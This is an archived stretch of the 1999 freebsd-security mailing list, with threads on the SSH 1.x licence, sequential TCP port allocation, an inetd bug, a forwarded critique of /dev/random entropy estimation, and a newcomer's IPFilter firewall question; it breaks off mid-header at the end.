12 Apr 1999 15:46:35 EST." <199904122046.PAA01508@alecto.physics.uiuc.edu> Date: Tue, 13 Apr 1999 15:13:39 +0200 Message-ID: <40675.924009219@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Apr 1999 15:46:35 EST, Igor Roshchin wrote: > That's the case for SSH v.2.x > > 1.x - is free for any use. No! See the COPYING file from the ssh distribution: | (a) You may copy and distribute literal (i.e., verbatim) copies of the | Program's source code as you receive it throughout the world, in any | medium. | | Local regulations may exist which limit your rights to distribute or use | cryptographic software. The Licensor is not responsible for unauthorized | distribution or use of the Program in such territories. | | (b) You may use the program for non-commercial purposes only, meaning | that the program must not be sold commercially as a separate product, | as part of a bigger product or project, or otherwise used for | financial gain without a separate license. Please see Section 2, | Restrictions, for more details. What _is_ true is that ssh 1.x is free for most use. Brett would want to read the COPYING file carefully to make sure that he can use it as part of a saleable solution. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 8: 7:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id CF00D15254 for ; Tue, 13 Apr 1999 08:07:13 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.8.8) id LAA21502; Tue, 13 Apr 1999 11:05:03 -0400 (EDT) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> Subject: Re: Sequential TCP port allocation? In-Reply-To: <19990412120126.B15762@homer.louisville.edu> from Keith Stevenson at "Apr 12, 99 12:01:26 pm" To: k.stevenson@louisville.edu (Keith Stevenson) Date: Tue, 13 Apr 1999 11:05:03 -0400 (EDT) Cc: freebsd-security@freebsd.org Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [I can't help too much with the subject matter, but this might be better suited to -security. I'm forwarding this there. However, one comment below.] Keith Stevenson wrote, > We recently had an auditing firm run ISS against our network. The only > "vulnerability" detected on our production FreeBSD box was a problem with > "Predictable Sequence Ports". The description states that this FreeBSD box > allocates its port numbers in sequential order. > > I've looked at several of my 2.2.8 boxes, and sure enough this appears to be > true. Is there a setting or sysctl knob that I can tweak to change the system > to allocate ports in a more random manner? If not, does 3.1-STABLE exhibit > the same behavior? > > (Whether or not this qualifies as a real security vulnerability is irrelevant > to me. Since the auditors labeled this as a "security hole" I have to present > some sort of response to my management.) I think it does matter if it is a 'real' vulnerability, _especially_ when talking to management. If it is going to cost $$$ to fix the problem or go with another solution, one must weigh risks against such a cost. There is no such thing as security-at-all-costs (unless you work for the NSA or sumthin'). If you truly want to be secure, do not connect to the Internet, assign each user random passwords (but make sure they don't write them down on Post-It Notes(tm) on the side of the monitor), and put all of the machines in an accessed controlled area with EM screening to keep in the Tempest radiation. Of course, that's an outlandish example, but one must remember there are always costs and benefits to be weighed. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 8:33: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id E4A74156B7 for ; Tue, 13 Apr 1999 08:33:01 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id LAA21022; Tue, 13 Apr 1999 11:30:39 -0400 (envelope-from jared) Date: Tue, 13 Apr 1999 11:30:39 -0400 From: Jared Mauch To: cjclark@home.com Cc: Keith Stevenson , freebsd-security@FreeBSD.ORG Subject: Re: Sequential TCP port allocation? Message-ID: <19990413113039.H17083@puck.nether.net> Mail-Followup-To: cjclark@home.com, Keith Stevenson , freebsd-security@FreeBSD.ORG References: <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com>; from Crist J. Clark on Tue, Apr 13, 1999 at 11:05:03AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The easiest way to determine the ease of tcp sequence guessing is to use nmap (www.insecure.org/nmap/), which will even go as far as telling you what OS the box is running. I would recommend this tool to everyone. On Tue, Apr 13, 1999 at 11:05:03AM -0400, Crist J. Clark wrote: > [I can't help too much with the subject matter, but this might be > better suited to -security. I'm forwarding this there. However, one > comment below.] > > Keith Stevenson wrote, > > We recently had an auditing firm run ISS against our network. The only > > "vulnerability" detected on our production FreeBSD box was a problem with > > "Predictable Sequence Ports". The description states that this FreeBSD box > > allocates its port numbers in sequential order. > > ... > > I think it does matter if it is a 'real' vulnerability, _especially_ > when talking to management. If it is going to cost $$$ to fix the > problem or go with another solution, one must weigh risks against such > a cost. There is no such thing as security-at-all-costs (unless you > work for the NSA or sumthin'). If you truly want to be secure, do not > connect to the Internet, assign each user random passwords (but make > sure they don't write them down on Post-It Notes(tm) on the side of > the monitor), and put all of the machines in an accessed controlled > area with EM screening to keep in the Tempest radiation. Of course, > that's an outlandish example, but one must remember there are always > costs and benefits to be weighed. Yes. Putting machines behind a outgoing only firewall, or only allowing a few things in (smtp, ident, ssh) will greatly reduce the number of attacks possible. Take a close look at everyone that probes your portmapper, and aduit your machines for suid binaries that are not used by you. Are you using lpr/lpd and such? what about uucp? I make it a habit to remove suid bits (and sgid) from most everything possible (i've been kinda slacking recently on that), but it makes it more and more dificult to break into the system once you're on it. It's almost safe to say once you have an account on the system, you can do whatever you want, because there'll be some unknown bug, etc.. that may be hiding away from you, and someone has to be the one to find it ;) Also, remember that physical access == root in 99.99% of the cases. - Jared -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 9:34:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from unix1.it-datacntr.louisville.edu (unix1.it-datacntr.louisville.edu [136.165.4.27]) by hub.freebsd.org (Postfix) with ESMTP id C835314DE2 for ; Tue, 13 Apr 1999 09:33:51 -0700 (PDT) (envelope-from k.stevenson@louisville.edu) Received: from homer.louisville.edu (ktstev01@homer.louisville.edu [136.165.1.20]) by unix1.it-datacntr.louisville.edu (8.8.8/8.8.7) with ESMTP id MAA22786; Tue, 13 Apr 1999 12:31:25 -0400 Received: (from ktstev01@localhost) by homer.louisville.edu (8.8.8/8.8.8) id MAA12030; Tue, 13 Apr 1999 12:31:25 -0400 (EDT) Message-ID: <19990413123125.B25109@homer.louisville.edu> Date: Tue, 13 Apr 1999 12:31:25 -0400 From: Keith Stevenson To: freebsd-security@freebsd.org Cc: jared@puck.nether.net Subject: Re: Sequential TCP port allocation? References: <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> <19990413113039.H17083@puck.nether.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990413113039.H17083@puck.nether.net>; from Jared Mauch on Tue, Apr 13, 1999 at 11:30:39AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok, exactly what did all of that have to do with my question? To restate: FreeBSD 2.2.8-STABLE appears to allocate TCP ports in sequential order. ISS identifies this as a potential security issue. My question is whether or not a sysctl or other configuration parameter exists which causes TCP ports to be allocated in a more random order. Furthermore, does anyone know whether or not FreeBSD 3.1-STABLE exhibits the same port allocation behavior as 2.2.8? What I do not want is to participate in a debate over whether or not sequential port allocation is a "real" security exposure. Regards, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville k.stevenson@louisville.edu PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 11:57:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from europe.std.com (europe.std.com [199.172.62.20]) by hub.freebsd.org (Postfix) with ESMTP id 4AD6C14BF6 for ; Tue, 13 Apr 1999 11:57:15 -0700 (PDT) (envelope-from lowell@world.std.com) Received: from world.std.com by europe.std.com (STD1.2/BZS-8-1.0) id OAA19383; Tue, 13 Apr 1999 14:54:52 -0400 (EDT) Received: by world.std.com (TheWorld/Spike-2.0) id AA21039; Tue, 13 Apr 1999 14:54:52 -0400 To: Keith Stevenson , freebsd-security@freebsd.org Subject: Re: Sequential TCP port allocation? References: <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> <19990413113039.H17083@puck.nether.net> <19990413123125.B25109@homer.louisville.edu> From: Lowell Gilbert Date: 13 Apr 1999 14:54:51 -0400 In-Reply-To: Keith Stevenson's message of Tue, 13 Apr 1999 12:31:25 -0400 Message-Id: Lines: 26 X-Mailer: Gnus v5.5/Emacs 20.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Keith Stevenson writes: > FreeBSD 2.2.8-STABLE appears to allocate TCP ports in sequential order. ISS > identifies this as a potential security issue. My question is whether or not > a sysctl or other configuration parameter exists which causes TCP ports to be > allocated in a more random order. Furthermore, does anyone know whether or not > FreeBSD 3.1-STABLE exhibits the same port allocation behavior as 2.2.8? Yes, it seems to, and while I haven't got the time at the moment to understand this implementation in depth, it also seems as though changing it to be "more random" might be, um, hard. There is (currently) no list kept of unused ports, so when nearly all of the ports are in use, random sampling could behave very badly indeed in terms of coming up with a port that wasn't already in use. I wonder if starting from a randomly-selected port and counting until you got to an empty one would qualify as "random enough"... > What I do not want is to participate in a debate over whether or not > sequential port allocation is a "real" security exposure. Fair enough, but don't be surprised if the volunteers who you are asking for help are more motivated to look at it if they think it's a "real" problem. Be well. Lowell Gilbert To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 13: 3:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from gameboy.game.net (annex2s12.urc.tue.nl [131.155.12.94]) by hub.freebsd.org (Postfix) with ESMTP id E025214D04 for ; Tue, 13 Apr 1999 13:03:50 -0700 (PDT) (envelope-from pete@bowtie.nl) Received: from bowtie.nl (alpina.game.net [192.168.1.2]) by gameboy.game.net (8.9.0/8.8.7) with ESMTP id VAA20530; Tue, 13 Apr 1999 21:58:21 +0200 Message-ID: <3713A1D3.3A633B55@bowtie.nl> Date: Tue, 13 Apr 1999 21:58:12 +0200 From: Peter Weymarshausen Reply-To: pete@bowtie.nl X-Mailer: Mozilla 4.5 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Max Booth , freebsd-security@freebsd.org Subject: Re: inetd problems References: <37120E9B.1AE1FD8D@ukonline.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Max Booth wrote: > Hi all, > > Reciently, since the load on one of our FreeBSD 3.0 systems has been > increasing I keep on getting the following errors when attempting > connections to the system: > > Escape character is '^]'. > inetd in realloc(): warning: junk pointer, too low to make sense. > inetd in free(): warning: junk pointer, too low to make sense. > Connection closed by foreign host. I've seen exactly the same on FreeBSD 2.2.7 under not so much load. The box is up for over 80 days though. Killing and restarting inetd helped. Didn't see it since. Peter -- Peter Weijmarshausen BowTie Technology P.E.Weijmarshausen@bowtie.nl Horsten 1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 14:42:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from free.telepisa.net.br (unknown [200.241.133.11]) by hub.freebsd.org (Postfix) with ESMTP id AF77715163 for ; Tue, 13 Apr 1999 14:42:47 -0700 (PDT) (envelope-from 15457@free.telepisa.net.br) Received: from piat04 (pi-at04.telepisa.net.br [10.86.8.94]) by free.telepisa.net.br (8.9.3/8.9.3) with SMTP id SAA00553 for ; Tue, 13 Apr 1999 18:39:14 -0300 (EST) Message-ID: <000b01be85f6$9f33e560$5e08560a@telepisa.net.br> From: "15457" <15457@free.telepisa.net.br> To: Subject: Date: Tue, 13 Apr 1999 18:42:35 -0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0008_01BE85DD.65AA7890" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.0810.800 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0810.800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0008_01BE85DD.65AA7890 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ------=_NextPart_000_0008_01BE85DD.65AA7890 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
------=_NextPart_000_0008_01BE85DD.65AA7890-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 15: 2:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id BA78E157D6 for ; Tue, 13 Apr 1999 15:02:36 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id AAA14707; Wed, 14 Apr 1999 00:00:17 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id AAA49275; Wed, 14 Apr 1999 00:00:16 +0200 (MET DST) Date: Wed, 14 Apr 1999 00:00:16 +0200 From: Eivind Eklund To: Max Booth Cc: freebsd-security@FreeBSD.ORG Subject: Re: inetd problems Message-ID: <19990414000015.B48840@bitbox.follo.net> References: <37120E9B.1AE1FD8D@ukonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <37120E9B.1AE1FD8D@ukonline.net>; from Max Booth on Mon, Apr 12, 1999 at 04:17:47PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 12, 1999 at 04:17:47PM +0100, Max Booth wrote: > Hi all, > > Reciently, since the load on one of our FreeBSD 3.0 systems has been > increasing I keep on getting the following errors when attempting > connections to the system: > > Escape character is '^]'. > inetd in realloc(): warning: junk pointer, too low to make sense. > inetd in free(): warning: junk pointer, too low to make sense. > Connection closed by foreign host. > > The only thing using inetd now is telnetd, so I can't emagine that it's > due to inetd being under too much preassure. > > Has anyone else experienced this problem? This is due to a bug in the signal handler in inetd. This has been fixed in FreeBSD-stable (ie, 3.1). It was fixed mid-january, IIRC. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 15:35:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from alpha.sea-to-sky.net (sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (Postfix) with ESMTP id 728A214C20 for ; Tue, 13 Apr 1999 15:35:46 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id PAA29298; Tue, 13 Apr 1999 15:33:45 -0700 Date: Tue, 13 Apr 1999 15:33:45 -0700 (PDT) From: Steve Reid To: freebsd-security@freebsd.org Subject: /dev/random's entropy_count estimate considered too generous (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Forwarded without permission... ----- Forwarded message from David Honig ----- X-BlackMail: toad.com, toad.com, SIZE=5908, 140.174.2.1 X-Authenticated-Timestamp: 11:18:32(PDT) on April 12, 1999 X-Sender: honig@m7.sprynet.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Mon, 12 Apr 1999 09:11:57 -0700 To: "Ge' Weijers" , "William H. Geiger III" , coderpunks@toad.com From: David Honig Subject: /dev/random's entropy_count estimate considered too generous Cc: cypherpunks@openpgp.net, mgraffam@idsi.net, steven.soroka@mts.mb.ca In-Reply-To: <19990412102200.A542@progressive-systems.com> Precedence: bulk I dug into the /dev/random code this weekend to try to answer WHGIII's query about analyzing that subsystem. The entropy estimation strikes me as more generous than one would like. An Analysis of the FreeBSD /dev/random: Entropy_count Calculation is Probably Too Generous David Honig rev A Intro This document discusses BSD's implementation of /dev/random. The entropy_count estimation appears to be insufficiently conservative. This is impossible to observe from its output, which is whitened with MD5. Random Pool The file /usr/src/sys/i386/isa/random_machdep.c implements BSD's /dev/random and corresponding system calls. This subsystem can use system interrupts designated by the "rndcontrol" utility or during kernel configuration. These interrupts yield raw entropy which is mixed, along with timing entropy, into a global pool of 128 32-bit integers. (All integers will be 32 bits hereon.) Random Output To obtain random values, this pool is fed to MD5. 9 hashes are required for every 16 bytes out of /dev/random. The number of bytes requested and the time of the request is also used in one final stir just before using the pool. Interrupt Processing When a designated interrupt occurs, the following happens. A number representing the interrupt's origin (e.g., the keyboard character) is passed as an integer to add_timer_randomness. This function also mixes in two timers: one derived from "timercounter", the other from "ticks". These are kernel timers with resolutions XXX Entropy Count The add_timer_randomness() call also increases the global "entropy_count", which is used to limit the number of random bytes emitted by the blocking random reads. (We ignore nonblocking access, where estimated entropy is ignored. In this case, /dev/random is just a PRNG and not cryptographically strong.) Add_timer_randomness() makes two calls to add_entropy_word(), which quickly stirs the entropy pool with a LFSR variant. Entropy Estimation It is this "entropy_count" estimate that I examine. The entropy count controls the "compression" or "distillation-factor": for every 32 bits (plus two timers) passed to add_timer_randomness(), we emit N bits. The minimal entropy_count increment is 2. More bits may be allowed depending on the size of the smallest of the last two time deltas. A crude log (base 2) of the smallest delta (actually, half the smallest delta, don't know why) is added to entropy_count. For instance, suppose the smallest delta is 1. Then no extra output bits are allowed. But if the smallest delta is tens of thousands of clocks, then dozens of *output* bits will be permitted by this single interrupt. This looks generous. The entropy estimation also fails to take into account periodicity, ie, if delta is close to last_delta. Suggestions The code in add_timer_randomness() could easily be changed, however, this code is executed during kernel interrupt handling, so what you can do there is limited. The entropy-estimating portion of add_timer_randomness() could be removed; better to err conservatively here. If necessary, the size of the random pool could be enlarged. (The maximum entropy_count is the size of the pool, in bits.) This is essentially an entropy caching strategy. However, the extract_entropy() runtime depends on the pool size: the MD5 function is run POOLSIZE/16 times for each 16 bytes output. Also, you would have to choose a different polynomial (the taps) in add_entropy_word(). Other strategies include acquring more data, see Gutmann on Stronger PRNGs where system data structures (heaps, performance counters, etc.) are mined. Or using a higher bandwidth cheap physical sources, e.g., a media stream. You could also xor N /dev/random bits for every bit of "true" entropy that you want, where N depends on how much entropy you think is *really* there. With this technique you could even assume fractional-bits per interrupt. This way you can override the assumptions built into the kernel without kernel mods. Although this seems paranoid, the raw entropy input has not been characterized. Therefore, one is subject to the hazard of overestimating input uncertainty. NB: to measure the entropy of the actual raw input to /dev/random, you'd modify add_entropy_word(r,num) to store "num" somewhere; eventually dump the stored values to a file for analysis. Or you could implement MUST in that function; but be careful, this is interrupt processing. Distribution: Unlimited Security Implications: Well, duh. :-) MD5 hides a lot. ----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 16:23:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from goblin.citadel.com.au (unknown [203.41.114.178]) by hub.freebsd.org (Postfix) with ESMTP id 000F21518F for ; Tue, 13 Apr 1999 16:23:12 -0700 (PDT) (envelope-from nick@citadel.com.au) Received: by goblin.citadel.com.au; id TAA02138; Wed, 14 Apr 1999 19:23:11 +1000 (EST) Received: from unknown(192.168.3.1) by goblin.citadel.com.au via smap (4.1) id xma002136; Wed, 14 Apr 99 19:22:32 +1000 Message-Id: <4.1.19990414111715.00acdb90@192.168.2.9> X-Sender: ncb@192.168.2.9 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 14 Apr 1999 11:22:47 +1000 To: Keith Stevenson , freebsd-security@freebsd.org From: Nicholas Brawn Subject: Re: Sequential TCP port allocation? Cc: jared@puck.nether.net In-Reply-To: <19990413123125.B25109@homer.louisville.edu> References: <19990413113039.H17083@puck.nether.net> <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> <19990413113039.H17083@puck.nether.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:31 PM 4/13/99 -0400, Keith Stevenson wrote: > > >Ok, exactly what did all of that have to do with my question? To restate: > >FreeBSD 2.2.8-STABLE appears to allocate TCP ports in sequential order. ISS >identifies this as a potential security issue. My question is whether or not >a sysctl or other configuration parameter exists which causes TCP ports to be >allocated in a more random order. Furthermore, does anyone know whether or not >FreeBSD 3.1-STABLE exhibits the same port allocation behavior as 2.2.8? I believe FreeBSD 3.1 exhibites the same behaviour. The actual place where the port allocation takes place is in /sys/netinet/in_pcb.c, specifically the in_pcbbind() function. If you look at the OpenBSD equivalent, they've implemented random allocation. I may be being a bit cynical here, but unless someones feeling radical, something along these lines will never be implemented into the base install, regardless of whether you implemented it with a sysctl knob. I'm actually looking at whipping up a patch to implement this, as soon as time permits. :) > >What I do not want is to participate in a debate over whether or not >sequential port allocation is a "real" security exposure. > >Regards, >--Keith Stevenson-- > >-- >Keith Stevenson >System Programmer - Data Center Services - University of Louisville >k.stevenson@louisville.edu >PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message Cheers, Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 22:59:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailc.telia.com (mailc.telia.com [194.22.190.4]) by hub.freebsd.org (Postfix) with ESMTP id E6A3815400 for ; Tue, 13 Apr 1999 22:59:48 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by mailc.telia.com (8.8.8/8.8.8) with ESMTP id HAA03022 for ; Wed, 14 Apr 1999 07:57:28 +0200 (CEST) Received: from tu (t4o68p97.telia.com [62.20.139.217]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id HAA17313 for ; Wed, 14 Apr 1999 07:57:27 +0200 (CEST) Received: by localhost with Microsoft MAPI; Wed, 14 Apr 1999 07:53:57 +0200 Message-ID: <01BE864B.F30FCA00.thomas.uhrfelt@plymovent.se> From: Thomas Uhrfelt Reply-To: "thomas.uhrfelt@plymovent.se" To: "'freebsd-security@freebsd.org'" Subject: IPFilter? Date: Wed, 14 Apr 1999 07:53:46 +0200 Organization: Plymovent AB X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am in the process of setting up a gateway/firewall and I need all the help I can possibly get, so this description is going to be rather lenghty I fear. Today we are running a WinNT Server based network, but since we are getting a "constant" connection to Internet and we are planning to install some sort of firewall I thought I should use FreeBSD instead of a MicroSoft sollution. Here is a brief description of the network today: Approx 40 workstations + 2 NT Servers + (192.168.1.xxx) -------------> (192.168.1.1) Router (Dynamic IP) 1 AS/400 Here is the first step of my "planned" change: Approx 40 workstations + 2 NT Servers + (192.168.1.xxx) ----> (192.168.1.1) FreeBSD (192.168.2.2) -------> (192.168.2.1) Router (Dynamic IP) 1 AS/400 The reason for changing the routers IP is that I don't want to change all the clients as we don't use DHCP. I was planning to use IPFilter+IFNAT on the FreeBSD box to accomplish this task. So now I need to know if there is any good beginners documentation on IPFilter + IFNAT and/or if its possible at all to accomplish this using these tools. I also want to put in rather restrictive rules on what is allowed to be passed through the BSD box, so I need a pretty elaborate doc on the IPFilters capabilities ( easy to understand wouldnt be bad either ). Anyone care to enlighten me on this subject? PS: The later changes will pretty much only involve a static IP on the other side of the router and a hardware VPN sollution ( if anyone can direct me to a VPN sollution for FreeBSD that is good, that would also be appriciated ) DS. / Thomas Uhrfelt Datortekniker PlymoVent AB To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 23:31:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from sentry.isrc.qut.edu.au (sentry.isrc.qut.edu.au [131.181.97.10]) by hub.freebsd.org (Postfix) with SMTP id 253FD155CE for ; Tue, 13 Apr 1999 23:31:22 -0700 (PDT) (envelope-from gaskell@isrc.qut.edu.au) Received: (qmail 27190 invoked from network); 14 Apr 1999 06:29:00 -0000 Received: from primrose.isrc.qut.edu.au (HELO isrc.qut.edu.au) (@131.181.6.10) by secure.isrc.qut.edu.au with SMTP; 14 Apr 1999 06:29:00 -0000 Received: from primrose.isrc.qut.edu.au (primrose.isrc.qut.edu.au [131.181.6.10]) by isrc.qut.edu.au (8.8.8+Sun/8.8.6) with ESMTP id QAA18926; Wed, 14 Apr 1999 16:28:59 +1000 (EST) Date: Wed, 14 Apr 1999 16:28:59 +1000 (EST) From: Gary Gaskell To: Thomas Uhrfelt Cc: "'freebsd-security@freebsd.org'" Subject: Re: IPFilter? In-Reply-To: <01BE864B.F30FCA00.thomas.uhrfelt@plymovent.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thomas, 1. I recommend buying some books and reading some web pages by gurus (not by some of the vendors!). OReilly's have some good books. try Building Inernet Firewalls by Chapman and Zwicky, or a book by Bellovin and Cheswick (I don't recall the published just now). 2. Yes, don't go for any OS with a history of continuing weaknesses. And perferrably add in some defence in depth, by using choking routers externally and internally. Good luck (but really there is no luck - just use a good scientific approach). Cheers, Gary On Wed, 14 Apr 1999, Thomas Uhrfelt wrote: > I am in the process of setting up a gateway/firewall and I need all the > help I can possibly get, so this description is going to be rather lenghty > I fear. > > Today we are running a WinNT Server based network, but since we are getting > a "constant" connection to Internet and we are planning to install some > sort of firewall I thought I should use FreeBSD instead of a MicroSoft > sollution. > > Here is a brief description of the network today: > > Approx 40 workstations + > 2 NT Servers + (192.168.1.xxx) -------------> (192.168.1.1) Router > (Dynamic IP) > 1 AS/400 > > > Here is the first step of my "planned" change: > > Approx 40 workstations + > 2 NT Servers + (192.168.1.xxx) ----> (192.168.1.1) FreeBSD (192.168.2.2) > -------> (192.168.2.1) Router (Dynamic IP) > 1 AS/400 > > The reason for changing the routers IP is that I don't want to change all > the clients as we don't use DHCP. > > I was planning to use IPFilter+IFNAT on the FreeBSD box to accomplish this > task. So now I need to know if there is any good beginners documentation on > IPFilter + IFNAT and/or if its possible at all to accomplish this using > these tools. I also want to put in rather restrictive rules on what is > allowed to be passed through the BSD box, so I need a pretty elaborate doc > on the IPFilters capabilities ( easy to understand wouldnt be bad either ). > > Anyone care to enlighten me on this subject? > > PS: The later changes will pretty much only involve a static IP on the > other side of the router and a hardware VPN sollution ( if anyone can > direct me to a VPN sollution for FreeBSD that is good, that would also be > appriciated ) DS. > / > > Thomas Uhrfelt > Datortekniker > > PlymoVent AB > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Cheers, Gary ----------------------------------------------------------- Gary Gaskell Manager Secure Network Laboratory Phone (07) 3864 1190 Information Security Research Centre Fax (07) 3221 2384 Queensland University of Technology ----------------------------------------------------------- _--_|\ / QUT A University for http://www.qut.edu.au/ _.--._/ the Real World. v To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 23:53:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailg.telia.com (mailg.telia.com [194.22.194.26]) by hub.freebsd.org (Postfix) with ESMTP id 517D314D85 for ; Tue, 13 Apr 1999 23:53:10 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by mailg.telia.com (8.8.5/8.8.8) with ESMTP id IAA02990 for ; Wed, 14 Apr 1999 08:50:50 +0200 (CEST) Received: from tu (t3o68p21.telia.com [62.20.139.21]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id IAA06945 for ; Wed, 14 Apr 1999 08:50:49 +0200 (CEST) Received: by localhost with Microsoft MAPI; Wed, 14 Apr 1999 08:47:19 +0200 Message-ID: 